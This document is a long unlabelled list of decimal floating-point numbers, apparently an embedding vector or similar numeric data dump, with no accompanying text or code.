-0.007653017062693834, 0.022583166137337685, -0.04212918132543564, 0.0021970472298562527, 0.020282750949263573, 0.0031236037611961365, -0.003317184280604124, -0.00921669788658619, -0.03864096850156784, -0.03605487942695618, -0.05066928640007973, 0.024252094328403473, 0.010697684250772, -0.017410989850759506, -0.021590828895568848, -0.0170351043343544, 0.009164074435830116, 0.00757408095523715, 0.008953578770160675, -0.046278949826955795, 0.021350262686610222, 0.016343476250767708, 0.036987077444791794, 0.011449454352259636, 0.0014293023850768805, 0.0194558035582304, 0.019155094400048256, -0.007262096740305424, -0.009735419414937496, -0.023740891367197037, -0.05027836561203003, -0.016343476250767708, 0.03151419013738632, 0.010787896811962128, -0.006202101241797209, -0.02873264253139496, 0.03163447603583336, -0.007577839773148298, 0.001067513134330511, 0.035844385623931885, -0.031002987176179886, -0.051811978220939636, -0.02375592663884163, -0.039543092250823975, -0.012306472286581993, 0.01992190070450306, -0.029935475438833237, 0.004619625397026539, -0.032476454973220825, -0.030717315152287483, -0.005367636680603027, 0.039212312549352646, -0.013125901110470295, 0.011923069134354591, -0.03337857872247696, 0.0011041619582101703, 0.05250360444188118, -0.0116148442029953, 0.008780671283602715, 0.0007935870089568198, -0.02086913026869297, 0.01614801585674286, -0.0163585115224123, -0.02228245697915554, 0.0004367312940303236, 0.03945288062095642, -0.0008062731358222663, -0.03993401303887367, -0.034972332417964935, 0.024793369695544243, 0.025740599259734154, -0.023545430973172188, 0.03148411959409714, 0.03178482875227928, -0.00032842945074662566, 0.004442959558218718, -0.007262096740305424, 0.015020361170172691, -0.027289245277643204, 0.026507403701543808, -0.0008208386716432869, -0.01133668888360262, -0.013276254758238792, 0.0371675007045269, 0.016523901373147964, -0.012960512191057205, -0.022267421707510948, 0.015606741420924664, 0.022598201408982277, 0.056382738053798676, 0.02483847551047802, 0.004529413301497698, -0.014358803629875183, 0.0031386390328407288, 0.0004024317895527929, 0.0022816213313490152, -0.02133522741496563, 0.026011236011981964, 0.03936266899108887, 0.008119113743305206, 0.000040613191231386736, 0.03401006758213043, 0.032957591116428375, -0.01076534390449524, -0.04642930626869202, -0.007916136644780636, 0.02443251945078373, 0.024958757683634758, -0.0046008313074707985, -0.008592729456722736, -0.015907449647784233, -0.004679767414927483, -0.042099110782146454, 0.009585065767168999, 0.00978804286569357, 0.004322676453739405, -0.02348528988659382, -0.0011558461701497436, 0.009585065767168999, -0.055691108107566833, -0.031183412298560143, -0.019335519522428513, 0.0073372735641896725, -0.01957608573138714, -0.0047662206925451756, 0.03635558858513832, -0.05075949802994728, -0.006547915283590555, 0.016989998519420624, -0.01080293208360672, -0.03352893516421318, 0.013847600668668747, 0.021154802292585373, -0.04080606624484062, 0.0032720782328397036, -0.011156264692544937, -0.01076534390449524, 0.000022699925466440618, 0.003044667886570096, 0.0163585115224123, 0.01891452819108963, -0.038821395486593246, -0.011404348537325859, -0.009479817934334278, -0.016734397038817406, 0.03313801437616348, 0.06711801141500473, 0.009254286997020245, 0.014802347868680954, 0.035032473504543304, -0.011494561098515987, 0.005322530400007963, 0.0056269969791173935, -0.03903188928961754, -0.006551674101501703, -0.007423727307468653, -0.009201662614941597, -0.02032785676419735, 0.0317547582089901, 0.017516236752271652, -0.008600247092545033, 0.026236766949295998, 0.0066907512955367565, 0.04814333841204643, 0.04739157110452652, 0.010652578435838223, -0.006100612226873636, -0.012532003223896027, 0.005555578973144293, 0.03912210091948509, -0.0073034437373280525, -0.004446718376129866, 0.010381941683590412, 0.00031503854552283883, 0.008149185217916965, 0.009013719856739044, 0.014328733086585999, 0.02193664386868477, 0.029048386961221695, -0.028025979176163673, -0.03512268513441086, 0.02079395391047001, -0.021786289289593697, 0.005021822638809681, 0.013321361504495144, -0.012141082435846329, -0.03536325320601463, -0.014621922746300697, -0.0076605346985161304, -0.012780087068676949, 0.019500909373164177, -0.006036711856722832, 0.0059916055761277676, 0.01858375035226345, 0.008622800000011921, -0.026236766949295998, 0.038009483367204666, 0.040685784071683884, 0.02673293463885784, 0.01097583957016468, 0.009058826602995396, -0.02658258192241192, -0.003198780585080385, 0.0035615095403045416, -0.012298954650759697, -0.0021857707761228085, -0.0032664400059729815, 0.0032927519641816616, -0.002766513032838702, -0.008239397779107094, -0.0012451187940314412, 0.00824691541492939, -0.007194437086582184, -0.01978658139705658, -0.013779941014945507, 0.01783198118209839, -0.03512268513441086, -0.006375008262693882, -0.05641280859708786, 0.0002544271119404584, -0.013764905743300915, 0.019711405038833618, -0.009066344238817692, 0.01683964394032955, -0.012058388441801071, -0.005672103259712458, 0.0245828740298748, 0.01730574108660221, -0.01670432649552822, 0.013231148943305016, 0.018147723749279976, 0.010036127641797066, -0.007284649647772312, -0.019606156274676323, -0.0071380543522536755, 0.0017694782000035048, -0.0015683798119425774, -0.03858082741498947, -0.0008231879910454154, -0.009434711188077927, 0.002888675546273589, 0.0001975745108211413, -0.016644183546304703, -0.028552217409014702, 0.005593167617917061, -0.0014415186597034335, 0.02780044823884964, -0.003503247397020459, -0.028161298483610153, 0.01831311360001564, 0.02572556398808956, 0.00996095035225153, -0.014531711116433144, -0.022192245349287987, 0.026477333158254623, 0.012050870805978775, -0.05229311063885689, 0.014554264023900032, 0.03313801437616348, 0.020147431641817093, 0.006134441588073969, -0.004969198722392321, -0.01218618918210268, 0.0020711258985102177, -0.02007225528359413, -0.006138200871646404, -0.02625180222094059, 0.010457118041813374, 0.013697246089577675, -0.005642032716423273, -0.01730574108660221, 0.008735565468668938, 0.023410111665725708, 0.009028756059706211, -0.025139182806015015, -0.0018559318268671632, -0.013622069731354713, -0.014892560429871082, -0.030266253277659416, 0.008728047832846642, 0.020914236083626747, -0.023951387032866478, -0.018899492919445038, -0.02996554598212242, 0.015606741420924664, 0.014050577767193317, 0.04245996102690697, -0.01756134256720543, 0.0029638526029884815, 0.007653017062693834, -0.012359095737338066, 0.022974086925387383, -0.031183412298560143, 0.015591706149280071, 0.012404202483594418, -0.004247499629855156, -0.013982919044792652, 0.0055405437014997005, 0.01103598065674305, 0.06934324651956558, 0.004209910985082388, -0.0034205527044832706, -0.04348236694931984, -0.022658342495560646, -0.004822603426873684, 0.015125609003007412, 0.02295904979109764, -0.007198195904493332, -0.040836136788129807, -0.0042738113552331924, 0.04651951789855957, -0.020778918638825417, -0.014952701516449451, 0.008667905814945698, -0.011284065432846546, -0.0232296884059906, -0.026477333158254623, 0.04044521600008011, -0.0225530955940485, -0.010239104740321636, -0.00639756117016077, 0.011005910113453865, 0.019140059128403664, 0.01757637783885002, -0.02698853611946106, -0.02038799785077572, 0.015576670877635479, 0.026567546650767326, -0.0007653956417925656, -0.03512268513441086, 0.01683964394032955, 0.028792783617973328, -0.021169837564229965, 0.0015533444238826632, -0.009735419414937496, 0.0244926605373621, -0.0022553096059709787, -0.00844989251345396, 0.011404348537325859, 0.01470461767166853, 0.024477625265717506, 0.020433103665709496, 0.049045462161302567, 0.015035396441817284, 0.04844404757022858, -0.01265228632837534, -0.0018822436686605215, 0.03130369633436203, -0.004991751629859209, -0.02841689996421337, 0.012095976620912552, 0.00844989251345396, 0.006318625528365374, 0.02402656339108944, -0.026026271283626556, -0.020688705146312714, 0.011494561098515987, 0.010577401146292686, -0.03683672100305557, 0.003927997313439846, -0.002595485420897603, -0.020839059725403786, -0.021260051056742668, -0.009367052465677261, 0.006570468191057444, 0.013704763725399971, 0.024853510782122612, 0.04555725306272507, -0.016508866101503372, -0.014787312597036362, 0.009464781731367111, -0.023064298555254936, -0.02389124594628811, 0.009570029564201832, 0.0024695638567209244, 0.0015852946089580655, -0.031814899295568466, -0.00790861900895834, 0.0017318897880613804, -0.013907741755247116, 0.004390335641801357, -0.017726732417941093, -0.01883935183286667, 0.030115898698568344, 0.009209180250763893, 0.005081964191049337, -0.018358219414949417, 0.007126777898520231, -0.007619187235832214, 0.018749140202999115, -0.018343184143304825, 0.0069238003343343735, -0.009720384143292904, -0.013020653277635574, 0.0014001713134348392, -0.036656297743320465, -0.051992401480674744, -0.019155094400048256, 0.032085537910461426, 0.001362582785077393, 0.0029337818268686533, 0.01589241437613964, 0.0011596049880608916, 0.010224069468677044, -0.008254433050751686, -0.03996408358216286, 0.01349426805973053, 0.030882705003023148, -0.002531584817916155, -0.015298516489565372, 0.020478209480643272, -0.013524339534342289, 0.027003571391105652, 0.008299538865685463, -0.0035803038626909256, -0.02900327928364277, -0.02967987209558487, -0.034220561385154724, 0.017245600000023842, -0.030536890029907227, 0.007619187235832214, 0.03879132494330406, -0.042309604585170746, 0.002384989755228162, 0.005803663283586502, 0.04224946349859238, -0.028973208740353584, -0.023725856095552444, 0.016508866101503372, -0.010893144644796848, 0.02005722001194954, -0.0232296884059906, 0.027785412967205048, -0.021365297958254814, -0.0035427152179181576, -0.0282665453851223, -0.007596634328365326, 0.04086620733141899, 0.028582289814949036, -0.025890953838825226, 0.03797941282391548, 0.019410697743296623, 0.019440768286585808, -0.0036949487403035164, 0.005529267247766256, 0.024206988513469696, -0.015088020823895931, -0.01662914827466011, -0.020162466913461685, -0.040896277874708176, -0.04895525053143501, 0.019711405038833618, -0.019876794889569283, 0.02288387343287468, -0.05436799302697182, 0.003501367988064885, 0.0020917996298521757, 0.006307349074631929, 0.013050723820924759, -0.006998977158218622, 0.016659218817949295, 0.002582329325377941, 0.010396976955235004, -0.007205714005976915, -0.006792240310460329, -0.03346879407763481, 0.05734500288963318, -0.0005027460865676403, 0.01595255546271801, -0.01622319221496582, 0.00005864392005605623, -0.013050723820924759, 0.02249295264482498, -0.022913943976163864, -0.003302149008959532, 0.01063754316419363, 0.01763652078807354, -0.03728778287768364, -0.025124147534370422, -0.030476748943328857, -0.01965126395225525, 0.02934909425675869, -0.046339090913534164, 0.03858082741498947, 0.01453922875225544, -0.011554702185094357, -0.0032194543164223433, 0.037859126925468445, 0.017816945910453796, -0.010577401146292686, -0.024282164871692657, -0.022117068991065025, -0.008104078471660614, 0.00915655680000782, -0.05184204876422882, 0.008089043200016022, 0.02040303312242031, -0.03536325320601463, -0.015997661277651787, -0.023124439641833305, 0.0036498424597084522, 0.017801908776164055, 0.008510034531354904, -0.006382525898516178, 0.007795853074640036, -0.0276801660656929, -0.0072996849194169044, 0.008532587438821793, -0.0015307912835851312, 0.010915697552263737, 0.020087290555238724, 0.0163585115224123, -0.00639756117016077, 0.028371794149279594, -0.012276401743292809, -0.009637689217925072, -0.017666591331362724, -0.01850857399404049, 0.005890116561204195, -0.00030775577761232853, -0.03843047469854355, -0.0245828740298748, -0.018072547391057014, -0.032145678997039795, 0.01097583957016468, -0.005446572322398424, -0.004807568155229092, 0.020839059725403786, -0.008803225122392178, 0.014215967617928982, -0.031002987176179886, 0.000903063511941582, -0.008660388179123402, -0.013614552095532417, 0.03963330388069153, -0.0012648527044802904, -0.0006620273343287408, -0.017681626603007317, 0.019470838829874992, -0.003164950991049409, -0.021650971844792366, -0.008931025862693787, 0.0024996346328407526, 0.004845156334340572, -0.005867563653737307, -0.02987533248960972, 0.033889785408973694, 0.008126632310450077, -0.04673001170158386, -0.00018042475858237594, -0.002386869164183736, -0.02356046624481678, -0.003946791402995586, 0.030100863426923752, 0.0038208700716495514, 0.0258458461612463, 0.007525215856730938, -0.007201955188065767, 0.008570175617933273, -0.016944892704486847, 0.0017807547701522708, -0.022327564656734467, -0.012148600071668625, 0.005897634197026491, 0.014043060131371021, 0.010878109373152256, -0.020297786220908165, -0.003764487337321043, 0.011659950017929077, 0.0132612194865942, -0.026913359761238098, -0.019155094400048256, -0.02181635983288288, -0.04417399689555168, -0.010787896811962128, -0.005841251462697983, 0.014900078065693378, 0.003664877964183688, 0.02718399651348591, -0.025094076991081238, 0.04288095235824585, 0.01589241437613964, 0.025755634531378746, -0.00928435754030943, 0.02531960792839527, -0.0276801660656929, 0.02141040563583374, -0.019170131534337997, 0.005957775749266148, 0.0053789131343364716, 0.0038490614388138056, 0.024673085659742355, 0.022026855498552322, 0.04615866765379906, -0.001832438982091844, 0.019365590065717697, 0.007758264429867268, 0.03016100637614727, -0.004912815988063812, -0.026206696406006813, -0.002413181122392416, 0.011426901444792747, 0.0019997076597064734, 0.008156702853739262, 0.013982919044792652, -0.003324702149257064, 0.03797941282391548, -0.0005473823985084891, -0.01736588217318058, -0.022117068991065025, -0.020102325826883316, 0.024462589994072914, -0.00869045965373516, -0.03536325320601463, 0.003758849110454321, 0.01998204179108143, -0.016178086400032043, -0.02577066980302334, 0.0018860026029869914, 0.03319815546274185, 0.003762607928365469, -0.010133856907486916, -0.022974086925387383, -0.03623530641198158, -0.016238227486610413, -0.011013427749276161, 0.007423727307468653, 0.009908325970172882, -0.0016200640238821507, 0.011464489623904228, -0.021455511450767517, -0.00999853853136301, 0.030581995844841003, -0.0004052509320899844, -0.009201662614941597, -0.020237643271684647, -0.02307933382689953, -0.006998977158218622, 0.007250819820910692, 0.015696953982114792, -0.037257712334394455, -0.017801908776164055, -0.02112473174929619, -0.026266837492585182, 0.009006202220916748, -0.0021857707761228085, 0.012065906077623367, 0.007457556668668985, 0.0006094034179113805, 0.015787165611982346, -0.019290413707494736, -0.029048386961221695, -0.02262827195227146, -0.017651556059718132, -0.0005812120507471263, -0.004104663152247667, 0.012765051797032356, -0.0020109843462705612, 0.014403910376131535, -0.03043164312839508, 0.0074650743044912815, 0.012088458985090256, -0.004826362244784832, 0.019335519522428513, 0.01413327269256115, -0.008389751426875591, 0.03298766165971756, -0.020568422973155975, 0.0503385066986084, 0.005581891164183617, 0.019696369767189026, -0.016057804226875305, -0.011449454352259636, -0.036445800215005875, -0.03569403290748596, 0.00180424761492759, 0.01329129096120596, -0.014298662543296814, 0.01181782130151987, 0.018884457647800446, -0.013140936382114887, 0.007713158614933491, -0.0458880290389061, -0.011599808931350708, -0.00898364931344986, -0.009058826602995396, 0.02160586416721344, -0.0006925679626874626, -0.020372962579131126, -0.038821395486593246, 0.030942846089601517, 0.01103598065674305, 0.01548645831644535, -0.0008588970522396266, -0.012396684847772121, -0.003482573665678501, 0.00540146604180336, -0.007765782531350851, 0.0017290705582126975, 0.018809281289577484, -0.015787165611982346, 0.027650093659758568, 0.028717607259750366, 0.0009895170805975795, -0.013276254758238792, -0.00573976244777441, -0.00001638623325561639, 0.0032758370507508516, 0.001058116089552641, -0.024958757683634758, 0.031273625791072845, -0.035573747009038925, 0.0033735670149326324, 0.012344060465693474, 0.035303112119436264, 0.021906573325395584, 0.016719361767172813, 0.004281328991055489, -0.00573976244777441, 0.025500033050775528, 0.015351139940321445, 0.02531960792839527, -0.012945476919412613, -0.028221439570188522, -0.006837346591055393, -0.001206590561196208, 0.03223589062690735, 0.015072985552251339, -0.0013409694656729698, -0.005198488477617502, 0.003476935438811779, -0.003657360328361392, 0.0025052728597074747, 0.016178086400032043, -0.0021557000000029802, -0.020568422973155975, -0.0008931965567171574, -0.00008527888712706044, -0.032085537910461426, -0.00035098253283649683, -0.02477833442389965, 0.008758118376135826, 0.0023229687940329313, 0.02295904979109764, 0.0032232131343334913, 0.035844385623931885, -0.004758703056722879, -0.024988830089569092, 0.02429720014333725, -0.010780379176139832, 0.007735711522400379, -0.007773300167173147, -0.010727755725383759, -0.020042182877659798, -0.011148746125400066, -0.004852674435824156, -0.0007954664761200547, 0.020824024453759193, -0.04853425920009613, -0.0006103431223891675, 0.007389897480607033, -0.011238958686590195, -0.002567294053733349, 0.012832711450755596, 0.003999415319412947, -0.006442667450755835, -0.018688997253775597, 0.010351870208978653, -0.006908764597028494, -0.01366717554628849, 0.022838767617940903, 0.058728259056806564, 0.01074279099702835, -0.01386263594031334, -0.007577839773148298, -0.012659803964197636, 0.007938689552247524, 0.005814939737319946, -0.013088312931358814, 0.0008852089522406459, 0.006055505946278572, 0.019365590065717697, -0.01188548095524311, 0.004991751629859209, 0.019290413707494736, -0.0019104350358247757, -0.0054127429611980915, 0.02396642230451107, -0.00664564548060298, 0.01999707706272602, -0.005961534567177296, 0.007705640979111195, 0.014907595701515675, -0.0005065049044787884, -0.05066928640007973, 0.007059118710458279, -0.0177116971462965, -0.04101656377315521, -0.025560174137353897, -0.02086913026869297, -0.009291875176131725, -0.0027308037970215082, 0.00669826939702034, 0.003050306113436818, 0.0026650240179151297, -0.003018355928361416, -0.02113976702094078, 0.006829828955233097, -0.010306764394044876, -0.01850857399404049, -0.025154218077659607, 0.0003554461873136461, -0.02483847551047802, 0.01127654779702425, 0.0036930693313479424, -0.014140790328383446, -0.036325518041849136, 0.01918516680598259, 0.011554702185094357, 0.0102616585791111, 0.009442228823900223, -0.0038359055761247873, -0.02127508632838726, 0.018749140202999115, 0.011178817600011826, -0.01965126395225525, 0.00328899291343987, -0.0034167938865721226, -0.007871029898524284, 0.007295926101505756, -0.028657466173171997, 0.01897467114031315, -0.02222231589257717, 0.016989998519420624, -0.03292751684784889, 0.0012366613373160362, 0.02483847551047802, -0.03686679154634476, -0.01655397191643715, -0.009073861874639988, 0.0027721512597054243, 0.027815483510494232, 0.015711989253759384, 0.007855994626879692, -0.0023304864298552275, -0.0007907678955234587, 0.026492368429899216, 0.005593167617917061, 0.007232025731354952, -0.0008579573477618396, -0.0336792878806591, 0.040565501898527145, 0.031002987176179886, -0.004995510447770357, 0.0023267276119440794, -0.01053229533135891, 0.003473176620900631, -0.016584042459726334, -0.023139474913477898, 0.020433103665709496, -0.015997661277651787, -0.002567294053733349, -0.025274502113461494, 0.020899200811982155, 0.007833441719412804, -0.000375884905224666, -0.004608348943293095, 0.015696953982114792, 0.0009735419298522174, -0.018749140202999115, 0.007487627677619457, 0.01275753416121006, 0.013524339534342289, 0.011148746125400066, -0.0056269969791173935, -0.02416188269853592, -0.0009707228164188564, 0.035904526710510254, 0.016238227486610413, -0.03728778287768364, 0.006450185086578131, -0.011968175880610943, -0.01804247684776783, -0.0020448139403015375, -0.04676008224487305, -0.016343476250767708, 0.008367198519408703, 0.012577109038829803, 0.02334997057914734, 0.008667905814945698, 0.0016830246895551682, -0.026146555319428444, -0.023575501516461372, 0.03849061578512192, -0.02005722001194954, 0.01717042364180088, -0.0035709065850824118, -0.0011492681223899126, -0.012471861205995083, 0.012178671546280384, 0.0156819187104702, 0.012035834603011608, 0.015290997922420502, 0.003178106853738427, -0.014674547128379345, -0.0062772780656814575, -0.0327170230448246, 0.005642032716423273, 0.030912775546312332, 0.0021970472298562527, 0.01804247684776783, -0.01998204179108143, 0.006262242794036865, 0.0183882899582386, -0.00869045965373516, 0.0156819187104702, 0.011998246423900127, -0.007630463689565659, -0.02336500585079193, 0.015441352501511574, 0.0035615095403045416, 0.00999853853136301, -0.030672209337353706, 0.011712574400007725, 0.024537766352295876, 0.004412889014929533, 0.005476643331348896, 0.02954455465078354, 0.0002842629619408399, 0.0062396894209086895, -0.028101155534386635, 0.013419091701507568, 0.02315451018512249, 0.02733435109257698, -0.006194583605974913, -0.01288533490151167, -0.006555432919412851, 0.006393802352249622, -0.023109404370188713, -0.015103056095540524, -0.013321361504495144, -0.003946791402995586, 0.014012989588081837, -0.019200202077627182, -0.015546600334346294, 0.009134003892540932, -0.020087290555238724, -0.02235763520002365, 0.04131726920604706, 0.026747969910502434, -0.012877817265689373, 0.021650971844792366, 0.014246038161218166, 0.007412450388073921, -0.002424457808956504, 0.04074592515826225, -0.02733435109257698, 0.0014640718000009656, -0.0036028570029884577, -0.0348520502448082, 0.011735127307474613, 0.013013135641813278, 0.026146555319428444, -0.032626811414957047, -0.023801032453775406, -0.0005126130417920649, -0.03554367646574974, -0.013411574065685272, -0.009013719856739044, -0.013050723820924759, -0.0021557000000029802, 0.00566834444180131, -0.010442082770168781, -0.00007817231380613521, 0.009795560501515865, 0.0177116971462965, -0.046008314937353134, -0.015027878805994987, 0.003324702149257064, -0.004691043868660927, -0.005228559020906687, -0.013441644608974457, -0.006341178435832262, 0.017621485516428947, 0.011299100704491138, -0.0033434962388128042, -0.009908325970172882, 0.019891830161213875, -0.023064298555254936, 0.004826362244784832, -0.00423998199403286, -0.0029337818268686533, 0.005228559020906687, -0.00847996398806572, -0.004067074973136187, 0.016178086400032043, 0.0029732496477663517, 0.033829640597105026, -0.004912815988063812, -0.013110865838825703, 0.016599077731370926, -0.008953578770160675, 0.003144277259707451, 0.014396391808986664, 0.03103305771946907, 0.007600393146276474, -0.0170351043343544, 0.0063148667104542255, -0.01359951589256525, 0.00817925576120615, -0.018328148871660233, 0.0020410551223903894, -0.01736588217318058, -0.04053542762994766, 0.010171446017920971, 0.026372086256742477, -0.0001064224197762087, 0.020553387701511383, -0.024733226746320724, -0.01338902022689581, 0.03379957005381584, -0.04309144616127014, 0.00012509919179137796, 0.0030916533432900906, -0.0017469251761212945, -0.010006056167185307, 0.022733518853783607, 0.009472300298511982, 0.00011840374645544216, -0.0015514650149270892, -0.007690605241805315, 0.0029243845492601395, -0.008367198519408703, -0.02867250144481659, 0.017471130937337875, -0.023876210674643517, 0.0006559191970154643, -0.019425733014941216, 0.010254140943288803, 0.01195314060896635, 0.004382818005979061, -0.022132104262709618, 0.009126485325396061, 0.01110364031046629, -0.010983357205986977, -0.02847704105079174, -0.004642178770154715, 0.024282164871692657, -0.004420406650751829, -0.015208303928375244, -0.0011248355731368065, 0.004386576823890209, 0.041106775403022766, 0.002621797379106283, -0.019034812226891518, -0.015456387773156166, -0.020433103665709496, -0.01541128195822239, -0.023665715008974075, 0.017937228083610535, -0.01339653879404068, -0.0054991962388157845, -0.0187792107462883, 0.0035408358089625835, -0.024552803486585617, 0.021260051056742668, -0.01208094134926796, -0.02249295264482498, 0.004397853277623653, -0.001373859355226159, -0.01790715754032135, 0.01581723801791668, 0.04555725306272507, 0.04396349936723709, 0.015847308561205864, -0.016178086400032043, 0.009013719856739044, -0.02404159866273403, -0.027379456907510757, -0.004424165468662977, -0.005965293385088444, -0.030100863426923752, -0.03536325320601463, -0.014674547128379345, -0.01972644031047821, 0.01583227328956127, 0.02268841303884983, 0.012336542829871178, 0.015358657576143742, 0.008615282364189625, 0.003787040477618575, 0.01628333516418934, -0.0030860151164233685, -0.010893144644796848, -0.008322091773152351, -0.0137949762865901, -0.012704909779131413, 0.005269906483590603, 0.005315012764185667, -0.0025447409134358168, 0.02598116546869278, 0.025500033050775528, -0.008028902113437653, -0.0006667258567176759, -0.0052135237492620945, -0.007344791200011969, -0.007262096740305424, -0.00666443957015872, 0.00011282420746283606, -0.0003427600604481995, -0.022974086925387383, -0.008487481623888016, -0.00009203307126881555, -0.006551674101501703, 0.014561781659722328, 0.010690166614949703, -0.0007968760328367352, 0.020342892035841942, -0.019485874101519585, -0.025740599259734154, -0.008976131677627563, 0.0006159814074635506, 0.013419091701507568, -0.019290413707494736, 0.01864389143884182, 0.018403325229883194, 0.04158790782094002, -0.017080210149288177, 0.041708189994096756, -0.014689582400023937, -0.041166916489601135, -0.020282750949263573, 0.016809573397040367, 0.01023158710449934, -0.0008466807776130736, 0.0003974983119405806, 0.0012911646626889706, -0.012614698149263859, 0.009810596704483032, -0.0052511123940348625, 0.005510472692549229, 0.00801386684179306, 0.004717355594038963, 0.0036554806865751743, -0.029604695737361908, 0.02100444957613945, 0.030010651797056198, 0.0010938250925391912, 0.016719361767172813, -0.01804247684776783, 0.027710236608982086, 0.00921669788658619, -0.00516841746866703, -0.006634368561208248, -0.003796437755227089, -0.019891830161213875, 0.011186335235834122, -0.009352016262710094, -0.002082402352243662, -0.011682502925395966, 0.0009998538298532367, 0.008968614041805267, 0.022056926041841507, 0.017666591331362724, 0.01245682593435049, -0.013005618005990982, -0.004390335641801357, 0.005221041385084391, 0.0016350994119420648, -0.023665715008974075, -0.006281036883592606, 0.009231733158230782, 0.0244926605373621, 0.030792491510510445, 0.013186043128371239, 0.024658050388097763, 0.01730574108660221, 0.004920333623886108, 0.013576962985098362, 0.022643307223916054, 0.0024488901253789663, 0.018553679808974266, -0.019741475582122803, 0.025079041719436646, 0.007506421767175198, -0.015651848167181015, -0.023169545456767082, -0.029379164800047874, 0.020763883367180824, -0.010524777695536613, -0.0074613154865801334, -0.017005033791065216, -0.021650971844792366, -0.01817779429256916, -0.026687828823924065, -0.006269760429859161, -0.013885188847780228, 0.007367344107478857, -0.004266293719410896, -0.02934909425675869, 0.01575709506869316, -0.005769833456724882, 0.025665422901511192, 0.005217282567173243, -0.017125315964221954, -0.014283626340329647, -0.01953097991645336, 0.012945476919412613, -0.009404640644788742, -0.0051796939224004745, 0.015997661277651787, 0.009991020895540714, 0.00540146604180336, -0.00013202957052271813, -0.014494122005999088, 0.002437613671645522, 0.006773446220904589, -0.006250966340303421, -0.021756218746304512, -0.014283626340329647, -0.011765197850763798, 0.04071585461497307, -0.007194437086582184, 0.0023210893850773573, 0.033559005707502365, -0.010036127641797066, -0.0037268989253789186, 0.009502370841801167, 0.015366175211966038, -0.010103786364197731, -0.000016298134141834453, 0.0137949762865901, -0.0016726878238841891, 0.021365297958254814, 0.001217867131344974, 0.002546620322391391, 0.02807108499109745, -0.004687285050749779, -0.015095538459718227, 0.0068899705074727535, -0.02195167914032936, 0.01110364031046629, 0.017456095665693283, -0.016809573397040367, 0.0006094034179113805, 0.013486750423908234, -0.009607618674635887, 0.0073372735641896725, -0.0151481619104743, 0.0005290580447763205, 0.000520130735822022, 0.019275378435850143, 0.012389167211949825, 0.0017760562477633357, 0.007401173934340477, -0.005897634197026491, -0.013501785695552826, 0.010171446017920971, 0.01117129996418953, -0.0011088604805991054, 0.01245682593435049, -0.017801908776164055, 0.006029194220900536, -0.008043937385082245, 0.010547330603003502, 0.004664731677621603, 0.03229603171348572, 0.019290413707494736, 0.021560758352279663, 0.01178023312240839, -0.0018258609343320131, -0.025469962507486343, -0.008592729456722736, 0.03629544749855995, -0.02739449217915535, -0.005044375546276569, -0.002144423546269536, 0.009720384143292904, 0.014561781659722328, 0.0025240671820938587, -0.011599808931350708, 0.013945329934358597, -0.015050431713461876, -0.015621776692569256, 0.00021073047537356615, 0.00609309459105134, 0.016794538125395775, -0.0007780817686580122, -0.00420615216717124, -0.03909203037619591, -0.004691043868660927, 0.0008086223970167339, -0.00039890786865726113, -0.010178963653743267, -0.024252094328403473, 0.01608787477016449, -0.004754944238811731, 0.011299100704491138, 0.006224654149264097, 0.006194583605974913, -0.013975401408970356, -0.005476643331348896, 0.012983065098524094, -0.004412889014929533, 0.009502370841801167, 0.0063148667104542255, 0.017756802961230278, 0.0008842692477628589, -0.01144193671643734, 0.0007578779477626085, 0.021575793623924255, 0.012501932680606842, -0.0034073968417942524, 0.0008579573477618396, 0.012750016525387764, -0.01811765320599079, 0.006002882029861212, 0.0065667093731462955, -0.006288554519414902, -0.023259758949279785, 0.03172468766570091, -0.007292167283594608, 0.0009829390328377485, -0.017516236752271652, -0.01587737910449505, -0.006266001611948013, -0.00042075617238879204, 0.0001947553682839498, 0.0019179527880623937, -0.005732244811952114, 0.0023549189791083336, 0.01843339577317238, -0.004499342292547226, 0.019350554794073105, 0.0061532361432909966, 0.027815483510494232, 0.0020316580776125193, -0.00790861900895834, -0.009412158280611038, 0.010735273361206055, -0.002272224286571145, -0.00755528686568141, 0.009013719856739044, -0.005814939737319946, -0.0066005392000079155, 0.005145864561200142, -0.015847308561205864, -0.022026855498552322, -0.013283773325383663, -0.00824691541492939, 0.0016952409641817212, 0.010178963653743267, 0.0008072128403000534, -0.04441456124186516, -0.010697684250772, -0.010795414447784424, 0.0003596748865675181, 0.0019085556268692017, 0.01953097991645336, -0.02301919274032116, -0.004247499629855156, -0.0013353311223909259, 0.022598201408982277, -0.025905989110469818, -0.014298662543296814, -0.015441352501511574, 0.0035502330865710974, -0.014674547128379345, -0.03821997717022896, 0.01683964394032955, 0.01174264494329691, 0.007720676250755787, 0.0008307056850753725, -0.0021782531403005123, 0.010178963653743267, -0.0032175749074667692, -0.010727755725383759, 0.060953497886657715, -0.00514962337911129, -0.028582289814949036, -0.011088605038821697, -0.0019170130835846066, -0.002283500973135233, 0.007720676250755787, -0.015095538459718227, 0.005905151832848787, 0.014922630973160267, -0.007393656298518181, 0.003984380047768354, -0.010396976955235004, -0.02942427061498165, -0.004296364728361368, 0.0023417631164193153, -0.01656900718808174, 0.004003174137324095, 0.019711405038833618, -0.008968614041805267, 0.005833733826875687, -0.006795999128371477, 0.018613820895552635, -0.022162174805998802, 0.0097279017791152, 0.028311651200056076, 0.006329901982098818, -0.00393927376717329, 0.003181865904480219, -0.0023248482029885054, -0.0030127177014946938, 0.002576691098511219, -0.018147723749279976, -0.028371794149279594, 0.010246622376143932, -0.001500720507465303, -0.030792491510510445, 0.00932194571942091, -0.006739616394042969, -0.0015815357910469174, 0.0041873580776154995, 0.012750016525387764, -0.007134295534342527, 0.03455134108662605, -0.0002478491223882884, 0.032205820083618164, -0.021515652537345886, -0.0016989997820928693, 0.004987992811948061, -0.03049178421497345, 0.01575709506869316, -0.0004379059246275574, 0.015576670877635479, -0.019064882770180702, 0.004721114411950111, 0.0056269969791173935, -0.006224654149264097, 0.009419675916433334, 0.005920187570154667, 0.011329171247780323, 0.014960220083594322, 0.003454382298514247, 0.033559005707502365, 0.003146156668663025, -0.01386263594031334, -0.0012939837761223316, -0.002567294053733349, -0.003662998555228114, -0.002881157910451293, -0.004469271749258041, 0.006709545850753784, -0.00483012106269598, -0.015937520191073418, 0.00928435754030943, -0.0026800595223903656, -0.008885919116437435, 0.005555578973144293, -0.010118821635842323, -0.006375008262693882, -0.03385971486568451, -0.002858604770153761, 0.0054991962388157845, 0.016734397038817406, -0.03250652924180031, 0.0029488170985132456, -0.013419091701507568, 0.007258337922394276, -0.011306618340313435, -0.00008028667070902884, -0.024071669206023216, -0.016102910041809082, 0.022718483582139015, -0.0017657193820923567, -0.004548207391053438, 0.0024808405432850122, -0.008058972656726837, 0.00828450359404087, 0.008652870543301105, -0.003304028417915106, 0.011607326567173004, 